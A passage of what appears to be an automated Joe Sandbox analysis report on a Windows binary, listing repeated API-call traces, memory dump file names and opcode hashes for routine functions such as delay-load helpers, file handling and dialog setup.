                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8b86b88aca20001c842a82caf62cc4962cc5fd324d4b0bf0dd9f740a88e19ab1
                                                                                              • Instruction ID: 5fbcb1f57de8559e84e2358ede0e2197a89e0f923123afbcee0bde06c9949a06
                                                                                              • Opcode Fuzzy Hash: 8b86b88aca20001c842a82caf62cc4962cc5fd324d4b0bf0dd9f740a88e19ab1
                                                                                              • Instruction Fuzzy Hash: D9B01295A781027D321471242E47F36011CE4C0B11730493AF800C4040D4800D450231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 403610df12fcbca061a5b325da6eb8bd178d58120a6dccc8f4dc26ca0f63b81f
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 403610df12fcbca061a5b325da6eb8bd178d58120a6dccc8f4dc26ca0f63b81f
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: dc3a2cf2260ad873f32644a0e191bf3fd104f6bcc3284f14129f78dea2ff3699
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: dc3a2cf2260ad873f32644a0e191bf3fd104f6bcc3284f14129f78dea2ff3699
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e64effabcf1590eee357d192b2caeb100923572239294a3e1cb02d42e5bc656a
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: e64effabcf1590eee357d192b2caeb100923572239294a3e1cb02d42e5bc656a
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5a9db4a0a365eb986b2ae969f269e54f3030bf15e106dea07a15f497d9e6a31f
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 5a9db4a0a365eb986b2ae969f269e54f3030bf15e106dea07a15f497d9e6a31f
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b16729dcde025a592f6fb2a4ba7fb7a2df947bfa399fcf95ef2cdf8da9e640e7
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: b16729dcde025a592f6fb2a4ba7fb7a2df947bfa399fcf95ef2cdf8da9e640e7
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 5ad24566d0b9091af7089c5b82e9d7f0974b69f140fe4f33a5f461720bfff6bb
• Instruction ID: be04505ec4a36a861f57a5f539e647f7ab1a89873716bf936fa47249709df567
• Opcode Fuzzy Hash: 5ad24566d0b9091af7089c5b82e9d7f0974b69f140fe4f33a5f461720bfff6bb
• Instruction Fuzzy Hash: FAA002E6AFD102BF322867617E17E3B022CE4D8FA2B308D3EF882C5085A9955C491131
Uniqueness

Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 0f9680cb29e22aabca88415703b0327ee7f5a3881d2592f92378cd4b9d5ceaa1
• Instruction ID: ff415bbfc1fbd413409c3cdbf6e74a30008c04be783be16d88fd5909f9c174b7
• Opcode Fuzzy Hash: 0f9680cb29e22aabca88415703b0327ee7f5a3881d2592f92378cd4b9d5ceaa1
• Instruction Fuzzy Hash: 09A002E6ABD203BD322866617E57E3B522CE8D4F62B308D3EF842C4085A8901D895131
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 89273acc0e48bf160664b027b7db294478d74356fc77d03eb33fe542fbb3aecd
• Instruction ID: ff415bbfc1fbd413409c3cdbf6e74a30008c04be783be16d88fd5909f9c174b7
• Opcode Fuzzy Hash: 89273acc0e48bf160664b027b7db294478d74356fc77d03eb33fe542fbb3aecd
• Instruction Fuzzy Hash: 09A002E6ABD203BD322866617E57E3B522CE8D4F62B308D3EF842C4085A8901D895131
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetEndOfFile.KERNELBASE(?,00A2A083,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,00A2922F,-00008BE0), ref: 00A2B19C
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
• Opcode ID: aea9a20652ba4c10813a04c314e2cb9fb1f1053e24305d71f030f455d239eaba
• Instruction ID: 35abd080334d44ff49fe72dd23526faeec22693c5a709ea08878b547499bf01a
• Opcode Fuzzy Hash: aea9a20652ba4c10813a04c314e2cb9fb1f1053e24305d71f030f455d239eaba
• Instruction Fuzzy Hash: 7DA01230040009468D001730D90404D3720F7207C531001945006CA0A1C71644478600
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetCurrentDirectoryW.KERNELBASE(?,00A3BFF6,00A71890,00000000,00A72892,00000006), ref: 00A3BC1D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
• Opcode ID: 02adef0b9c2e422f3abb6df77d066df92a7dab7acebc69079e7a462940aeba4a
• Instruction ID: 3dcfba12cf79973c9d746892ab8dcfdcd7450e49385c5ff088f46279f84663f4
• Opcode Fuzzy Hash: 02adef0b9c2e422f3abb6df77d066df92a7dab7acebc69079e7a462940aeba4a
• Instruction Fuzzy Hash: 3FA0123110020087C2004B719F0550E76657F61601F00C024600080030D73088A0A500
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
  • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
• SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A3D4B1
• EndDialog.USER32(?,00000006), ref: 00A3D4C4
• GetDlgItem.USER32(?,0000006C), ref: 00A3D4E0
• SetFocus.USER32(00000000), ref: 00A3D4E7
• SetDlgItemTextW.USER32(?,00000065,?), ref: 00A3D521
• SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A3D558
• FindFirstFileW.KERNEL32(?,?), ref: 00A3D56E
  • Part of subcall function 00A3BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3BC3F
  • Part of subcall function 00A3BC2B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A3BC50
  • Part of subcall function 00A3BC2B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A3BC5E
  • Part of subcall function 00A3BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3BC6C
  • Part of subcall function 00A3BC2B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A3BC87
  • Part of subcall function 00A3BC2B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00A3BCAE
  • Part of subcall function 00A3BC2B: _swprintf.LIBCMT ref: 00A3BCD4
• _swprintf.LIBCMT ref: 00A3D5B7
  • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
• SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A3D5CA
• FindClose.KERNEL32(00000000), ref: 00A3D5D1
• _swprintf.LIBCMT ref: 00A3D620
• SetDlgItemTextW.USER32(?,00000068,?), ref: 00A3D633
• SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A3D650
• _swprintf.LIBCMT ref: 00A3D683
• SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A3D696
• _swprintf.LIBCMT ref: 00A3D6E0
• SetDlgItemTextW.USER32(?,00000069,?), ref: 00A3D6F3
  • Part of subcall function 00A3C093: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A3C0B9
  • Part of subcall function 00A3C093: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A6072C,?,?), ref: 00A3C108
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
